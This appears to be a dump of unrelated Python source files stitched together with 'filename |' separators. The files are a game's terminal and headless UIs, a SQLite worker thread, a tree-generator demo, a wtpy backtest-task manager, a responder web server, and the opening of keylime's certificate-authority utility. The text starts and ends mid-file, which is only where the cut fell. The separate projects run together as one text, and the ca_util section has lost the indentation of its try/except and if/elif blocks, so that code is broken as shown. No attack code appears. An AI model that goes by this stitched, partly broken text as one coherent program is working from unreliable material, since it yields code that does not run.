        main thread for its event loop."""
        # Thread.setDaemon() is deprecated; pass daemon=True at construction
        loop_thread = threading.Thread(target=game_loop, daemon=True)
        loop_thread.start()
        self.tk.mainloop()
class TerminalUI(UI):
    """终端游戏 UI — prints the board as tab-separated text on stdout."""

    name = "TerminalUI"

    def __init__(self, board_shape):
        super().__init__(board_shape)
        self._init_board()

    def _print_col_labels(self):
        # one tab-separated column index per board column
        for j in range(self.height):
            print(f"\t{j}", end="")
        print()

    def _init_board(self):
        """Print an empty board with row/column labels."""
        self._print_col_labels()
        for i in range(self.width):
            print(f"{i}", end="")
            for j in range(self.height):
                print("\t_", end="")
            print(f"\t{i}", end="")
            print()
        self._print_col_labels()

    def render(self, board, last_move):
        """Print the whole board; *last_move* is not highlighted in text mode."""
        self._print_col_labels()
        for i in range(self.width):
            print(f"{i}", end="")
            # bugfix: iterate this board's own height, not the global HEIGHT
            # (was inconsistent with _init_board and broke non-default sizes)
            for j in range(self.height):
                print("\t{}".format({BLACK: "x", WHITE: "o", EMPTY: "_"}[board[i, j]]), end="")
            print(f"\t{i}", end="")
            print()
        print()
        self._print_col_labels()

    def message(self, message):
        print(message)

    def reset(self):
        pass

    def input(self):
        """Read an "x,y" coordinate pair from stdin."""
        x, y = input("> ").split(",")
        return int(x), int(y)
class HeadlessUI(UI):
    """无 UI — no-op front-end for automated (bot vs bot) play."""

    name = "HeadlessUI"

    def __init__(self, board_shape):
        super().__init__(board_shape)

    def render(self, board, last_move):
        """Nothing to draw."""

    def message(self, message):
        """Nothing to show."""

    def reset(self):
        """Nothing to reset."""

    def input(self):
        """No human input available; return a sentinel coordinate."""
        return -1, -1
|
DataBaseWorker.py | import sqlite3
import queue
import threading
import time
class DataBaseWorker:
    """Background writer that drains a queue of match data into SQLite.

    Items put on the queue are tuples whose elements 0-2 are text columns
    and whose element 3 is an iterable of match states providing
    ``get_sql_format()`` for the remaining six columns.
    """

    def __init__(self, database_path):
        self.database_path = database_path
        self.queue = queue.Queue()
        self.work = True   # cleared by stop() to end the worker loop

    def start(self):
        """Launch the worker thread (connection is created on that thread)."""
        thread = threading.Thread(target=self._do_work)
        thread.start()

    def _do_work(self):
        print('Started DataBase')
        sql_connection = sqlite3.connect(self.database_path)
        cursor = sql_connection.cursor()
        while self.work:
            try:
                # blocking get with timeout replaces the old empty()/get()
                # busy-wait, which both burned CPU and was race-prone
                data = self.queue.get(timeout=0.1)
            except queue.Empty:
                continue
            for match_state in data[3]:
                try:
                    # security fix: all values bound as parameters instead of
                    # concatenating data[0..2] into the SQL string
                    cursor.execute(
                        "INSERT INTO match_table VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)",
                        (data[1], data[0], data[2], *match_state.get_sql_format()))
                except sqlite3.Error:
                    print('Error with Adding row in SQL')
            sql_connection.commit()
        cursor.close()
        sql_connection.close()

    def add_to_queue(self, data):
        """Enqueue one batch for the worker thread."""
        self.queue.put(data)

    def stop(self):
        """Signal the worker loop to finish and close its connection."""
        self.work = False
test_random_generator.py | from threading import Thread
from subt_world_generation.random_tree_generator import RandomTreeGenerator, plot_random_tree
import matplotlib.pyplot as plt
from subt_world_generation.tile_tree import save_tree_as_world_file
import cProfile
def generator_thread():
    """Build a random 50-tile tree and plot it (runs on a worker thread)."""
    generator = RandomTreeGenerator(max_tiles=50)
    generator.gen_tree()
    plot_random_tree(generator, tunnel_axis=True)
def main():
    """Kick off tree generation in the background and display the figure."""
    plt.figure(figsize=(10, 10))
    worker = Thread(target=generator_thread)
    worker.start()
    plt.show()   # blocks until the plot window is closed
    worker.join()
# Standard script entry point: run the demo only when executed directly.
if __name__ == "__main__":
    main()
WtBtMon.py | '''
Description: 回测管理模块
version:
Author: Wesley
Date: 2021-08-11 14:03:33
LastEditors: Wesley
LastEditTime: 2021-09-02 14:18:50
'''
import os
import json
import subprocess
import platform
import sys
import psutil
import hashlib
import datetime
import shutil
import json
import threading
import time
from wtpy import WtDtServo
from .WtLogger import WtLogger
from .EventReceiver import BtEventReceiver, BtEventSink
def isWindows() -> bool:
    """Return True when the current platform is Windows."""
    return "windows" in platform.system().lower()
def md5_str(v:str) -> str:
    """Return the hex MD5 digest of *v* (encoded with the default UTF-8)."""
    digest = hashlib.md5(v.encode())
    return digest.hexdigest()
def gen_btid(user:str, straid:str) -> str:
    """Generate a unique backtest id from user, strategy id and wall time."""
    stamp = datetime.datetime.now().timestamp()
    seed = user + "_" + straid + "_" + str(stamp)
    # md5 of the seed, hex-encoded (inlined equivalent of md5_str)
    return hashlib.md5(seed.encode()).hexdigest()
def gen_straid(user:str) -> str:
    """Generate a unique strategy id from the user name and wall time."""
    stamp = datetime.datetime.now().timestamp()
    seed = user + "_" + str(stamp)
    # md5 of the seed, hex-encoded (inlined equivalent of md5_str)
    return hashlib.md5(seed.encode()).hexdigest()
class BtTaskSink:
    """Callback interface for backtest task lifecycle events.

    Subclasses override the hooks they care about; the defaults do nothing.
    """

    def __init__(self):
        pass

    def on_start(self, user:str, straid:str, btid:str):
        """Called when a backtest process starts."""

    def on_stop(self, user:str, straid:str, btid:str):
        """Called when a backtest process exits."""

    def on_state(self, user:str, straid:str, btid:str, statInfo:dict):
        """Called with a strategy state update."""

    def on_fund(self, user:str, straid:str, btid:str, fundInfo:dict):
        """Called with a fund (equity) update."""
class WtBtTask(BtEventSink):
    '''
    回测任务类 (backtest task)

    Wraps one backtest child process: launches runBT.py in the task folder,
    listens to its message-queue events and watches the process until it
    terminates.
    '''

    def __init__(self, user:str, straid:str, btid:str, folder:str, logger:WtLogger = None, sink:BtTaskSink = None):
        self.user = user
        self.straid = straid
        self.btid = btid
        self.logger = logger
        self.folder = folder
        self.sink = sink

        self._cmd_line = None
        self._mq_url = "ipc:///wtpy/bt_%s.ipc" % (btid)
        self._ticks = 0
        self._state = 0          # 0 = not started, 1 = launched
        self._procid = None      # pid of the spawned backtest process
        self._evt_receiver = None

    def __check__(self):
        # Poll once per second until the child process disappears, then
        # notify the sink that the backtest has stopped.
        while True:
            time.sleep(1)
            if psutil.pid_exists(self._procid):
                continue
            print("%s process %d finished" % (self.btid, self._procid))
            if self.sink is not None:
                self.sink.on_stop(self.user, self.straid, self.btid)
            break

    def run(self):
        '''Start the backtest process and the monitoring thread.'''
        if self._state != 0:
            return

        self._evt_receiver = BtEventReceiver(url=self._mq_url, logger=self.logger, sink=self)
        self._evt_receiver.run()
        self.logger.info("回测%s开始接收%s的通知信息" % (self.btid, self._mq_url))

        fullPath = os.path.join(self.folder, "runBT.py")
        try:
            if isWindows():
                self._procid = subprocess.Popen([sys.executable, fullPath],
                                                cwd=self.folder,
                                                creationflags=subprocess.CREATE_NEW_CONSOLE).pid
            else:
                self._procid = subprocess.Popen([sys.executable, fullPath],
                                                cwd=self.folder).pid
            self._cmd_line = sys.executable + " " + fullPath
        except OSError:
            # bugfix: the original fell through after a failed launch and then
            # formatted a None pid with %d, raising a TypeError
            self.logger.info("回测%s启动异常" % (self.btid))
            return

        self._state = 1
        self.logger.info("回测%s的已启动,进程ID: %d" % (self.btid, self._procid))
        self.watcher = threading.Thread(target=self.__check__, name=self.btid, daemon=True)
        self.watcher.start()

    @property
    def cmd_line(self) -> str:
        '''Command line used to launch (or to identify) the backtest process.'''
        fullPath = os.path.join(self.folder, "runBT.py")
        if self._cmd_line is None:
            self._cmd_line = sys.executable + " " + fullPath
        return self._cmd_line

    def is_running(self, pids) -> bool:
        '''
        Return True when the backtest process is alive.  If the recorded pid
        is stale, try to re-attach by matching the command line against the
        processes in *pids*.
        '''
        bNeedCheck = (self._procid is None) or (not psutil.pid_exists(self._procid))
        if not bNeedCheck:
            return True

        for pid in pids:
            try:
                pInfo = psutil.Process(pid)
                cmdLine = pInfo.cmdline()
                if len(cmdLine) == 0:
                    continue
                cmdLine = ' '.join(cmdLine)
                if self.cmd_line.upper() != cmdLine.upper():
                    continue

                self._procid = pid
                self.logger.info("回测%s挂载成功,进程ID: %d" % (self.btid, self._procid))
                if self._mq_url != '':
                    self._evt_receiver = BtEventReceiver(url=self._mq_url, logger=self.logger, sink=self)
                    self._evt_receiver.run()
                    self.logger.info("回测%s开始接收%s的通知信息" % (self.btid, self._mq_url))
                # bugfix: the original called watcher.run(), which executed the
                # monitor loop synchronously on the caller's thread, and then
                # returned False even after a successful attach
                self.watcher = threading.Thread(target=self.__check__, name=self.btid, daemon=True)
                self.watcher.start()
                return True
            except psutil.Error:
                continue
        return False

    def on_begin(self):
        '''Backtest process reported start.'''
        if self.sink is not None:
            self.sink.on_start(self.user, self.straid, self.btid)

    def on_finish(self):
        '''Backtest process reported completion.'''

    def on_state(self, statInfo:dict):
        '''Forward a strategy state update to the sink.'''
        if self.sink is not None:
            self.sink.on_state(self.user, self.straid, self.btid, statInfo)
        print(statInfo)

    def on_fund(self, fundInfo:dict):
        '''Forward a fund (equity) update to the sink.'''
        if self.sink is not None:
            self.sink.on_fund(self.user, self.straid, self.btid, fundInfo)
        print(fundInfo)
class WtBtMon(BtTaskSink):
    '''
    回测管理器 (backtest manager)

    Keeps per-user strategy and backtest metadata on disk: each user folder
    holds a marker.json index, one folder per strategy and one folder per
    backtest run.  Running backtest processes are tracked in tasks.json so
    they can be re-attached after a restart.
    '''

    def __init__(self, deploy_folder:str, dtServo:WtDtServo = None, logger:WtLogger = None):
        self.path = deploy_folder
        self.user_stras = dict()    # user -> {straid: strategy info}
        self.user_bts = dict()      # user -> {btid: backtest info}
        self.logger = logger
        self.dt_servo = dtServo

        self.task_infos = dict()    # btid -> persisted task parameters
        self.task_map = dict()      # btid -> live WtBtTask
        self.__load_tasks__()

    def __load_user_data__(self, user:str):
        '''Load a user's marker.json into the caches; False if it is absent.'''
        folder = os.path.join(self.path, user)
        if not os.path.exists(folder):
            os.mkdir(folder)

        filepath = os.path.join(folder, "marker.json")
        if not os.path.exists(filepath):
            return False

        with open(filepath, "r") as f:
            obj = json.loads(f.read())

        self.user_stras[user] = obj["strategies"]
        self.user_bts[user] = obj["backtests"]
        return True

    def __save_user_data__(self, user):
        '''Persist the cached strategies/backtests of *user* to marker.json.'''
        folder = os.path.join(self.path, user)
        if not os.path.exists(folder):
            os.mkdir(folder)

        obj = {
            "strategies":{},
            "backtests":{}
        }
        if user in self.user_stras:
            obj["strategies"] = self.user_stras[user]
        if user in self.user_bts:
            obj["backtests"] = self.user_bts[user]

        filepath = os.path.join(folder, "marker.json")
        with open(filepath, "w") as f:
            f.write(json.dumps(obj, indent=4, ensure_ascii=False))
        return True

    def get_strategies(self, user:str) -> list:
        '''Return all strategy infos of *user*, or None if unknown.'''
        if user not in self.user_stras:
            if not self.__load_user_data__(user):
                return None

        return list(self.user_stras[user].values())

    def add_strategy(self, user:str, name:str) -> dict:
        '''Create a new strategy for *user* from the template; return its info.'''
        if user not in self.user_stras:
            self.__load_user_data__(user)

        if user not in self.user_stras:
            self.user_stras[user] = dict()

        straid = gen_straid(user)
        self.user_stras[user][straid] = {
            "id":straid,
            "name":name,
            "perform":{
                "days": 0,
                "total_return": 0,
                "annual_return": 0,
                "win_rate": 0,
                "max_falldown": 0,
                "max_profratio": 0,
                "std": 0,
                "down_std": 0,
                "sharpe_ratio": 0,
                "sortino_ratio": 0,
                "calmar_ratio": 0
            }
        }

        folder = os.path.join(self.path, user, straid)
        if not os.path.exists(folder):
            os.mkdir(folder)

        # seed the strategy folder with the template implementation
        fname = os.path.join(folder, "MyStrategy.py")
        srcfname = os.path.join(self.path, "template/MyStrategy.py")
        shutil.copyfile(srcfname, fname)

        self.__save_user_data__(user)
        return self.user_stras[user][straid]

    def del_strategy(self, user:str, straid:str):
        '''Move a strategy folder into the user's .del bin and drop the index entry.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return False

        if straid not in self.user_stras[user]:
            return True

        folder = os.path.join(self.path, user, straid)
        if not os.path.exists(folder):
            return True

        # soft delete: keep the files in a .del folder instead of removing them
        delFolder = os.path.join(self.path, user, ".del")
        if not os.path.exists(delFolder):
            os.mkdir(delFolder)
        shutil.move(folder, delFolder)

        self.user_stras[user].pop(straid)
        self.__save_user_data__(user)
        return True

    def has_strategy(self, user:str, straid:str, btid:str = None) -> bool:
        '''Check for a strategy of *user* (or for a backtest when btid given).'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return False

        if btid is None:
            return straid in self.user_stras[user]
        return btid in self.user_bts[user]

    def get_strategy_code(self, user:str, straid:str, btid:str = None) -> str:
        '''Read MyStrategy.py of a strategy, or runBT.py of a given backtest.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        if btid is None:
            path = os.path.join(self.path, user, straid, "MyStrategy.py")
            if not os.path.exists(path):
                return None
            with open(path, "r", encoding="UTF-8") as f:
                return f.read()

        thisBts = self.user_bts[user]
        if btid not in thisBts:
            return None
        bt_path = os.path.join(self.path, "%s/%s/backtests/%s/runBT.py" % (user, straid, btid))
        with open(bt_path, "r") as f:
            return f.read()

    def set_strategy_code(self, user:str, straid:str, content:str) -> bool:
        '''Overwrite MyStrategy.py of a strategy with *content*.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return False

        path = os.path.join(self.path, user, straid, "MyStrategy.py")
        if not os.path.exists(path):
            # bugfix: declared -> bool; return False (was None) when missing
            return False

        with open(path, "w", encoding="UTF-8") as f:
            f.write(content)
        return True

    def get_backtests(self, user:str, straid:str) -> list:
        '''Return all backtest infos of *user*, or None.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        if user not in self.user_bts:
            return None

        return list(self.user_bts[user].values())

    def del_backtest(self, user:str, btid:str):
        '''Drop a backtest from the user's index (output files stay on disk).'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return

        if user not in self.user_bts:
            return

        if btid in self.user_bts[user]:
            self.user_bts[user].pop(btid)
            self.logger.info("Backtest %s of %s deleted" % (btid, user))
            self.__save_user_data__(user)

    def __read_bt_csv__(self, user:str, straid:str, btid:str, fname:str) -> list:
        '''Return the data lines (header stripped) of a backtest CSV, or None.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        if btid not in self.user_bts[user]:
            return None

        filename = "%s/%s/backtests/%s/outputs_bt/%s/%s" % (user, straid, btid, btid, fname)
        filename = os.path.join(self.path, filename)
        if not os.path.exists(filename):
            return None

        with open(filename, "r") as f:
            lines = f.readlines()
        return lines[1:]

    def get_bt_funds(self, user:str, straid:str, btid:str) -> list:
        '''Return the daily fund records of a backtest, or None.'''
        lines = self.__read_bt_csv__(user, straid, btid, "funds.csv")
        if lines is None:
            return None

        funds = list()
        for line in lines:
            cells = line.split(",")
            if len(cells) > 10:
                continue

            tItem = {
                "date": int(cells[0]),
                "closeprofit": float(cells[1]),
                "dynprofit": float(cells[2]),
                "dynbalance": float(cells[3]),
                "fee": 0
            }
            if len(cells) > 4:
                tItem["fee"] = float(cells[4])
            funds.append(tItem)
        return funds

    def get_bt_trades(self, user:str, straid:str, btid:str) -> list:
        '''Return the trade records of a backtest, or None.'''
        lines = self.__read_bt_csv__(user, straid, btid, "trades.csv")
        if lines is None:
            return None

        items = list()
        for line in lines:
            cells = line.split(",")
            if len(cells) > 10:
                continue

            item = {
                "code": cells[0],
                "time": int(cells[1]),
                "direction": cells[2],
                "offset": cells[3],
                "price": float(cells[4]),
                "volume": float(cells[5]),
                "tag": cells[6],
                "fee": 0
            }
            # bugfix: the fee column is 7; the old code subsequently overwrote
            # item["fee"] with cells[4] (the price) whenever len(cells) > 4
            if len(cells) > 7:
                item["fee"] = float(cells[7])
            items.append(item)
        return items

    def get_bt_rounds(self, user:str, straid:str, btid:str) -> list:
        '''Return the closed-round records of a backtest, or None.'''
        lines = self.__read_bt_csv__(user, straid, btid, "closes.csv")
        if lines is None:
            return None

        items = list()
        for line in lines:
            cells = line.split(",")
            item = {
                "code": cells[0],
                "direct": cells[1],
                "opentime": int(cells[2]),
                "openprice": float(cells[3]),
                "closetime": int(cells[4]),
                "closeprice": float(cells[5]),
                "qty": float(cells[6]),
                "profit": float(cells[7]),
                "maxprofit": float(cells[8]),
                "maxloss": float(cells[9]),
                "entertag": cells[11],
                "exittag": cells[12]
            }
            items.append(item)
        return items

    def get_bt_signals(self, user:str, straid:str, btid:str) -> list:
        '''Return the signal records of a backtest, or None.'''
        lines = self.__read_bt_csv__(user, straid, btid, "signals.csv")
        if lines is None:
            return None

        items = list()
        for line in lines:
            cells = line.split(",")
            if len(cells) > 10:
                continue

            item = {
                "code": cells[0],
                "target": float(cells[1]),
                "sigprice": float(cells[2]),
                "gentime": cells[3],
                "tag": cells[4]
            }
            items.append(item)
        return items

    def get_bt_summary(self, user:str, straid:str, btid:str) -> dict:
        '''Return the performance summary (summary.json) of a backtest, or None.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        thisBts = self.user_bts[user]
        if btid not in thisBts:
            return None

        filename = "%s/%s/backtests/%s/outputs_bt/%s/summary.json" % (user, straid, btid, btid)
        filename = os.path.join(self.path, filename)
        if not os.path.exists(filename):
            return None

        with open(filename, "r") as f:
            return json.loads(f.read())

    def get_bt_state(self, user:str, straid:str, btid:str) -> dict:
        '''
        Return the cached backtest info with its "state" refreshed from
        btenv.json, or None.

        NOTE: the class previously defined get_bt_state twice; the first
        definition was dead code (shadowed by this one) and was removed.
        '''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        thisBts = self.user_bts[user]
        if btid not in thisBts:
            return None

        filename = "%s/%s/backtests/%s/outputs_bt/%s/btenv.json" % (user, straid, btid, btid)
        filename = os.path.join(self.path, filename)
        if not os.path.exists(filename):
            return None

        with open(filename, "r") as f:
            thisBts[btid]["state"] = json.loads(f.read())
        return thisBts[btid]["state"]

    def update_bt_state(self, user:str, straid:str, btid:str, stateObj:dict):
        '''Replace the cached state of a backtest with *stateObj*.'''
        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        thisBts = self.user_bts[user]
        if btid not in thisBts:
            return None

        thisBts[btid]["state"] = stateObj

    def get_bt_kline(self, user:str, straid:str, btid:str) -> list:
        '''Return (and cache) the kline bars covering a backtest, or None.'''
        if self.dt_servo is None:
            return None

        if user not in self.user_bts:
            if not self.__load_user_data__(user):
                return None

        btState = self.get_bt_state(user, straid, btid)
        if btState is None:
            return None

        thisBts = self.user_bts[user]
        if "kline" not in thisBts[btid]:
            code = btState["code"]
            period = btState["period"]
            stime = btState["stime"]
            etime = btState["etime"]
            barList = self.dt_servo.get_bars(stdCode=code, period=period, fromTime=stime, endTime=etime)
            if barList is None:
                return None

            bars = list()
            for realBar in barList:
                bar = dict()
                if period[0] == 'd':
                    bar["time"] = realBar.date
                else:
                    # presumably the wtpy minute-bar time encoding relative
                    # to 1990 — TODO confirm against WtDtServo docs
                    bar["time"] = 1990*100000000 + realBar.time
                bar["bartime"] = bar["time"]
                bar["open"] = realBar.open
                bar["high"] = realBar.high
                bar["low"] = realBar.low
                bar["close"] = realBar.close
                bar["volume"] = realBar.vol
                bars.append(bar)
            thisBts[btid]["kline"] = bars

        return thisBts[btid]["kline"]

    def run_backtest(self, user:str, straid:str, fromTime:int, endTime:int, capital:float, slippage:int=0) -> dict:
        '''Prepare a backtest folder from the templates, launch the backtest
        process and return the new backtest info.'''
        if user not in self.user_bts:
            self.__load_user_data__(user)

        if user not in self.user_bts:
            self.user_bts[user] = dict()

        btid = gen_btid(user, straid)

        # create the backtest folder
        folder = os.path.join(self.path, user, straid, "backtests")
        if not os.path.exists(folder):
            os.mkdir(folder)
        folder = os.path.join(folder, btid)
        os.mkdir(folder)

        # copy the strategy implementation into the backtest folder
        old_path = os.path.join(self.path, user, straid, "MyStrategy.py")
        new_path = os.path.join(folder, "MyStrategy.py")
        shutil.copyfile(old_path, new_path)

        # instantiate the config template with this backtest's id
        old_path = os.path.join(self.path, "template/configbt.json")
        new_path = os.path.join(folder, "configbt.json")
        with open(old_path, "r", encoding="UTF-8") as f:
            content = f.read()
        content = content.replace("$BTID$", btid)
        with open(new_path, "w", encoding="UTF-8") as f:
            f.write(content)

        old_path = os.path.join(self.path, "template/logcfgbt.json")
        new_path = os.path.join(folder, "logcfgbt.json")
        shutil.copyfile(old_path, new_path)

        old_path = os.path.join(self.path, "template/fees.json")
        new_path = os.path.join(folder, "fees.json")
        shutil.copyfile(old_path, new_path)

        # instantiate the runner template with the backtest parameters
        old_path = os.path.join(self.path, "template/runBT.py")
        new_path = os.path.join(folder, "runBT.py")
        with open(old_path, "r", encoding="UTF-8") as f:
            content = f.read()
        content = content.replace("$FROMTIME$", str(fromTime))
        content = content.replace("$ENDTIME$", str(endTime))
        content = content.replace("$STRAID$", btid)
        content = content.replace("$CAPITAL$", str(capital))
        content = content.replace("$SLIPPAGE$", str(slippage))
        with open(new_path, "w", encoding="UTF-8") as f:
            f.write(content)

        btInfo = {
            "id":btid,
            "capital":capital,
            "runtime":datetime.datetime.now().strftime("%Y.%m.%d %H:%M:%S"),
            "state":{
                "code": "",
                "period": "",
                "stime": fromTime,
                "etime": endTime,
                "progress": 0,
                "elapse": 0
            },
            "perform":{
                "days": 0,
                "total_return": 0,
                "annual_return": 0,
                "win_rate": 0,
                "max_falldown": 0,
                "max_profratio": 0,
                "std": 0,
                "down_std": 0,
                "sharpe_ratio": 0,
                "sortino_ratio": 0,
                "calmar_ratio": 0
            }
        }
        self.user_bts[user][btid] = btInfo
        self.__save_user_data__(user)

        # launch the task
        btTask = WtBtTask(user, straid, btid, folder, self.logger, sink=self)
        btTask.run()
        self.task_map[btid] = btTask

        # persist the task parameters so it can be re-attached after a restart
        taskInfo = {
            "user":user,
            "straid":straid,
            "btid":btid,
            "folder":folder
        }
        self.task_infos[btid]= taskInfo
        self.__save_tasks__()

        return btInfo

    def __update_bt_result__(self, user:str, straid:str, btid:str):
        '''Refresh the cached state and performance summary of a finished backtest.'''
        if user not in self.user_bts:
            self.__load_user_data__(user)

        if user not in self.user_bts:
            self.user_bts[user] = dict()

        # refresh the backtest state from btenv.json
        stateObj = self.get_bt_state(user, straid, btid)
        self.user_bts[user][btid]["state"] = stateObj

        # refresh the performance summary for both the backtest and the strategy
        summaryObj = self.get_bt_summary(user, straid, btid)
        self.user_bts[user][btid]["perform"] = summaryObj
        self.user_stras[user][straid]["perform"] = summaryObj
        self.__save_user_data__(user)

    def __save_tasks__(self):
        '''Persist the running-task registry to tasks.json.'''
        filename = os.path.join(self.path, "tasks.json")
        with open(filename, "w") as f:
            f.write(json.dumps(self.task_infos, indent=4))

    def __load_tasks__(self):
        '''Reload tasks.json and re-attach to still-running backtest processes.'''
        filename = os.path.join(self.path, "tasks.json")
        if not os.path.exists(filename):
            return

        with open(filename, "r") as f:
            task_infos = json.loads(f.read())

        pids = psutil.pids()
        for btid in task_infos:
            tInfo = task_infos[btid].copy()
            tInfo["logger"] = self.logger
            btTask = WtBtTask(**tInfo)
            if btTask.is_running(pids):
                self.task_map[btid] = btTask
                self.task_infos[btid] = task_infos[btid]
                # bugfix: the format string previously had no % argument
                self.logger.info("回测任务%s已恢复" % btid)
            else:
                # the task was recorded earlier and has since finished;
                # refresh its results from the output files
                self.__update_bt_result__(tInfo["user"], tInfo["straid"], btid)

        self.__save_tasks__()

    def on_start(self, user:str, straid:str, btid:str):
        '''BtTaskSink hook: a backtest process started.'''

    def on_stop(self, user:str, straid:str, btid:str):
        '''BtTaskSink hook: a backtest process finished; collect its results.'''
        self.__update_bt_result__(user, straid, btid)

    def on_state(self, user:str, straid:str, btid:str, statInfo:dict):
        '''BtTaskSink hook: cache the latest strategy state.'''
        self.user_bts[user][btid]["state"] = statInfo

    def on_fund(self, user:str, straid:str, btid:str, fundInfo:dict):
        '''BtTaskSink hook: fund updates are currently ignored.'''
web_server.py | import responder
import datetime
import logging
import threading
log = logging.getLogger("WebServer")
class WebServer:
    """HTTP front-end: registers one route per plugin plus a home page."""

    def __init__(self, settings, plugins):
        self.api = responder.API(
            title="Solar Wallbox",
            version="0.0.1",
            description="See and control your energy data and control your wallbox.",
            static_dir=settings["common"]["static-assets"],
            templates_dir=settings["common"]["templates"]
        )
        self.address = settings["web"]["address"]
        self.port = settings["web"]["port"]
        self.plugins = plugins
        self.__register_routes()
        self.__start_plugin_runtimes()

    def __register_routes(self):
        """Attach the index route plus each plugin's own route."""
        self.api.add_route("/", endpoint=self.__list_plugins)
        for current in self.plugins.get_plugins():
            current.add_webserver(self)
            self.api.add_route(current.settings['plugin_path'], endpoint=current.endpoint)

    def __start_plugin_runtimes(self):
        """Spawn a daemon thread for every plugin that has a runtime."""
        log.info("Starting plugin runtimes...")
        for current in self.plugins.get_plugins():
            if not current.has_runtime:
                continue
            worker = threading.Thread(target=current.runtime, args=(self.plugins,), daemon=True)
            worker.start()

    def render_template(self, path, template_vars=None):
        """Render *path*, injecting the current year into the variables."""
        if not template_vars:
            template_vars = {}
        template_vars['currentYear'] = datetime.datetime.now().year
        return self.api.template(path, vars=template_vars)

    def __list_plugins(self, req, resp):
        """Home page: list every registered plugin as a card."""
        ctx = {"pluginPackage": "home"}
        ctx['res'] = self.__get_web_dict(self.plugins.list_plugins())
        resp.html = self.render_template("home/index.html", ctx)

    def run(self):
        """Serve until interrupted."""
        self.api.run(address=self.address, port=self.port)

    def __get_web_dict(self, plugins):
        """Build the card payload for the home-page template."""
        cards = [
            {
                "id": name,
                "icons": [
                    {
                        "name": "sticky",
                        "size": 48,
                        "fill": "currentColor"
                    }
                ],
                "title": title,
                "href": href
            }
            for (name, title, href) in plugins
        ]
        return {"cards": cards}
ca_util.py | #!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
import simplejson as json
from M2Crypto import X509, EVP, BIO
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
# def globalcb(*args):
# global global_password
# return global_password.encode()
def setpassword(pw):
    """Validate *pw* and store it as the module-wide keystore password.

    Raises an Exception when the password is empty.
    """
    global global_password
    if not pw:
        raise Exception("You must specify a password!")
    global_password = pw
def cmd_mkcert(workingdir, name):
    """Create a CA-signed certificate for *name* inside *workingdir*.

    Writes <name>-cert.crt, <name>-private.pem (mode 0600) and
    <name>-public.pem, stores the new private key in the encrypted
    keystore, and increments the CA serial counter.
    """
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        priv = read_private()
        cacert = X509.load_cert('cacert.crt')
        ca_pk = EVP.load_key_string(priv[0]['ca'])
        cert, pk = ca_impl.mk_signed_cert(
            cacert, ca_pk, name, priv[0]['lastserial'] + 1)
        with open('%s-cert.crt' % name, 'wb') as f:
            f.write(cert.as_pem())
        # capture the private key into the in-memory keystore dict
        f = BIO.MemoryBuffer()
        pk.save_key_bio(f, None)
        priv[0][name] = f.getvalue()
        f.close()
        # increment serial number after successful creation
        priv[0]['lastserial'] += 1
        write_private(priv)
        # write out the private key with password
        # (file created with 0600 so only the owner can read it)
        with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
            biofile = BIO.File(f)
            pk.save_key_bio(biofile, None)
            biofile.close()
        pk.get_rsa().save_pub_key('%s-public.pem' % name)
        # sanity check: the freshly written cert must verify against the CA key
        cc = X509.load_cert('%s-cert.crt' % name)
        if cc.verify(cacert.get_pubkey()):
            logger.info(
                "Created certificate for name %s successfully in %s" % (name, workingdir))
        else:
            logger.error("ERROR: Cert does not validate against CA")
    finally:
        os.chdir(cwd)
def cmd_init(workingdir):
    """(Re)initialize the CA in *workingdir*.

    Wipes previous key material, generates a new CA certificate and key
    via the configured backend (cfssl or openssl), persists them in the
    encrypted keystore, and emits an empty CRL (cacrl.der / cacrl.pem).
    """
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        # start from a clean slate: remove all prior certs/keys/keystore
        rmfiles("*.pem")
        rmfiles("*.crt")
        rmfiles("*.zip")
        rmfiles("*.der")
        rmfiles("private.yml")
        if config.CA_IMPL == 'cfssl':
            pk_str, cacert, ca_pk, _ = ca_impl.mk_cacert()
        elif config.CA_IMPL == 'openssl':
            cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
        else:
            raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
        priv = read_private()
        # write out keys
        with open('cacert.crt', 'wb') as f:
            f.write(cacert.as_pem())
        f = BIO.MemoryBuffer()
        ca_pk.save_key_bio(f, None)
        priv[0]['ca'] = f.getvalue()
        f.close()
        # store the last serial number created.
        # the CA is always serial # 1
        priv[0]['lastserial'] = 1
        write_private(priv)
        ca_pk.get_rsa().save_pub_key('ca-public.pem')
        # generate an empty crl
